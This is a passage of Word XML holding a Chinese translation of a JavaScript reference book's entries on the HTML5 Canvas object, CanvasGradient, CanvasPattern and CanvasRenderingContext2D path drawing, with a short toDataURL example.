        <w:t>元素</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Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>对象表现为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素。它自己并不能做什么，但它定义一个支持在客户端使用脚本绘图的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。可以直接为这个对象定义</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>，也可以用</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法从画布中导出图片，不过，实际绘图的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是由</w:t>
      </w:r>
      <w:r>
        <w:t>getContext()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的一个独立</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>上下文</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象实现的。可参考</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContex</w:t>
      </w:r>
      <w:r>
        <w:t>t2D</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unsigned long height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这些属性对应＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性，指定</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>坐标空间的维度。</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>的默认值分别为</w:t>
      </w:r>
      <w:r>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>150</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素的尺寸在样式表或内联</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性中都没有另外的定义，则</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性也将指定</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素在屏幕上的尺寸。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置这两个属性中的任意一个（即使设置为它现在的值）都将清空画布为透明黑色（</w:t>
      </w:r>
      <w:r>
        <w:t>transparent black</w:t>
      </w:r>
      <w:r>
        <w:t>），并且</w:t>
      </w:r>
      <w:r>
        <w:t>将它所有的绘图属性重置为默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object getContext(string contextId,[any args...])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回一个用于在</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素上画图的对象。如果传入字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"2d"</w:t>
      </w:r>
      <w:r>
        <w:t>，本方法将返回一个用于</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>绘图的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext 2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象，在这种情况下不需要额外的</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每一个</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素只有一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext 2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象，所以多次调用</w:t>
      </w:r>
      <w:r>
        <w:t>getContext("2d")</w:t>
      </w:r>
      <w:r>
        <w:t>返回的是同一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准将</w:t>
      </w:r>
      <w:r>
        <w:t>"2d</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>作为这个方法的唯一参数。一些独立的标准（如</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL</w:t>
      </w:r>
      <w:r>
        <w:t>）正在开发</w:t>
      </w:r>
      <w:r>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:t>绘图。在支持这些标准的浏览器中，可以</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为这个方法传入字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"webgl"</w:t>
      </w:r>
      <w:r>
        <w:t>来获得一个支持</w:t>
      </w:r>
      <w:r>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:t>渲染的对象。需要注意的是，本书中只有关于</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext 2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的绘图上下文的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string toDataURL([string type],[any args...])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</w:t>
      </w:r>
      <w:r>
        <w:t>的方式返回</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>位图的内容，这种方式可以很容易地在＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中使用或者通过网络传输。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>的内容复制到一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，并将其追加到当前文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=document.getElementById("my_canvas");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var image=document.createElement("img");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>image.src=canvas.toDataURL();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(image);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>参数定义图片格式使用的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。如果省略该参数，默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"image/png"</w:t>
      </w:r>
      <w:r>
        <w:t>。只有</w:t>
      </w:r>
      <w:r>
        <w:t>PNG</w:t>
      </w:r>
      <w:r>
        <w:t>图片格式是要求支持的实现方式</w:t>
      </w:r>
      <w:r>
        <w:t>。除</w:t>
      </w:r>
      <w:r>
        <w:t>PNG</w:t>
      </w:r>
      <w:r>
        <w:t>外的图片格式，可以传入额外的参数来定义编码细节。比如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"image/jpeg"</w:t>
      </w:r>
      <w:r>
        <w:t>，第二个参数应该为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个数字，用于定义图片的质量级别。在写这本书的时候，其他参数的讨论还没有形成标准。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为了防止跨域的信息泄露，在非</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>同源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>origin-clean</w:t>
      </w:r>
      <w:r>
        <w:t>）的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签上</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>将不能工作。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>包含一张（直接通过</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>或非直接通过</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>绘制的）图片，且该图片与包含当前</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>的文档不同源，则称这个</w:t>
      </w:r>
      <w:r>
        <w:t>canva</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>是非同源的。同样，如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>在绘制文本中使用了来自另一个源的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>字体，也称它为非同源的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="794" w:name="CanvasGradient"/>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:bookmarkEnd w:id="794"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>的颜色渐变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一种颜色渐变，可指派给</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>createLinerGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>createRadialGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都返回</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创</w:t>
      </w:r>
      <w:r>
        <w:t>建</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象后，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>addColorStop()</w:t>
      </w:r>
      <w:r>
        <w:t>来定义渐变中什么颜色在什么位置出现。颜色将在定义的位置插入并产生平滑的渐变或淡出（淡入）。如果没有定义色标（</w:t>
      </w:r>
      <w:r>
        <w:t>color stop</w:t>
      </w:r>
      <w:r>
        <w:t>），渐变将全是清一色的透明黑色。</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void addColorStop(double offset,string color)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>addColorStop()</w:t>
      </w:r>
      <w:r>
        <w:t>定义一种渐变中的固定颜色。参数</w:t>
      </w:r>
      <w:r>
        <w:t>color</w:t>
      </w:r>
      <w:r>
        <w:t>的值为一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>颜色字符串，参数</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个浮点数，对应从渐变的起点到终点的位置。</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>相当于起始点，</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>相当于终点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果定义两个或多个色标，各种颜色之间将平滑地过渡。在第一个色标之前，渐变将显示第一个色标的颜色，在最后一个色标之后，渐变将显示最后一个色标的颜色。如果只定义一种色标，渐变将显示一种固定的颜色。如果没有设置色标，渐变将全是清一色的透明黑色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="795" w:name="CanvasPattern"/>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="795"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>的基于图片的模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象是不透明对象，由</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>CreatePattern()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回。</w:t>
      </w:r>
      <w:r>
        <w:t>Canva</w:t>
      </w:r>
      <w:r>
        <w:t>sPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象可用做</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="796" w:name="CanvasRenderingContext2D"/>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:bookmarkEnd w:id="796"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用于在</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>上画图的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象提供用于绘制二维图形的属性及方法，下面几节是一个概览。更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>21.4</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>TextMetrics</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建并渲染路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画布的一个强大特性是可以通过基本的绘制操作来生成各种形状，然后可以给它们描边（</w:t>
      </w:r>
      <w:r>
        <w:t>stroke</w:t>
      </w:r>
      <w:r>
        <w:t>）或填充（</w:t>
      </w:r>
      <w:r>
        <w:t>fill</w:t>
      </w:r>
      <w:r>
        <w:t>）。多个操作的结果统称为当前路径。一张画布只维护一条当前路径。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了将多个片断连接成一个形状，绘图操作之间需要一个连接点。为了实现这点，画布维护一个当前位置，画布的绘图操作将显式把这个位置作为起点，并不断更新，直到达到终点。可以把这个过程想象为用一支钢笔在纸上画画：画完一条直线或曲线时，当前位置就是操作完成后钢笔所在的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用当前路径创建一系列断开的形状，这些形状会一起使用相同的绘图参数进行渲</w:t>
      </w:r>
      <w:r>
        <w:t>染。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来分开形状，这个方法会在不添加连接线的情况下将当前点移动到一个新的位置。这个操作会生成一条新的子路径（</w:t>
      </w:r>
      <w:r>
        <w:t>subpath</w:t>
      </w:r>
      <w:r>
        <w:t>），这是一个用于关联操作集合的画布专用术语。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可用的方法有：</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>绘制直线，</w:t>
      </w:r>
      <w:r>
        <w:t>rect()</w:t>
      </w:r>
      <w:r>
        <w:t>绘制矩形，</w:t>
      </w:r>
      <w:r>
        <w:t>arc()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>arcTo()</w:t>
      </w:r>
      <w:r>
        <w:t>绘制扇形，</w:t>
      </w:r>
      <w:r>
        <w:t>bezierCurveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>quadraticCurveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>绘制曲线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>路径完成之后，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>对它描边，使用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>进行填充，也可以同时描边及填充。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在描边及填充之外，也可以使用当前路径来定义一个当前画布渲染时使用的裁剪区域（</w:t>
      </w:r>
      <w:r>
        <w:t>clipping region</w:t>
      </w:r>
      <w:r>
        <w:t>）。在这个区域中的像素会显示，之外的则不显示。裁剪区域是可累加的，可以在当前路径的当前裁剪区域中再次调用</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>来生成一个新的区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果所有子路径中的片断都没有能形成一个闭合形状，</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>操作会在子路径的起点到终点之间添加一条虚拟的线（描边时不可见）来隐式地闭合形状，也可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>来显式地添加这条线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>isPointInPath()</w:t>
      </w:r>
      <w:r>
        <w:t>来测试一个点是否包含在</w:t>
      </w:r>
      <w:r>
        <w:t>当前路径之中（或在路径边界线上）。如果一条路径与自身相交，或者由多条重叠的子路径组成，那么</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的定义取决于非零缠绕规则（</w:t>
      </w:r>
      <w:r>
        <w:t>nonzero winding rule</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果在一个圆里面画了另一个圆，并且两个圆绘制的方向相同，那么在大圆里的所有点都被认为是包含</w:t>
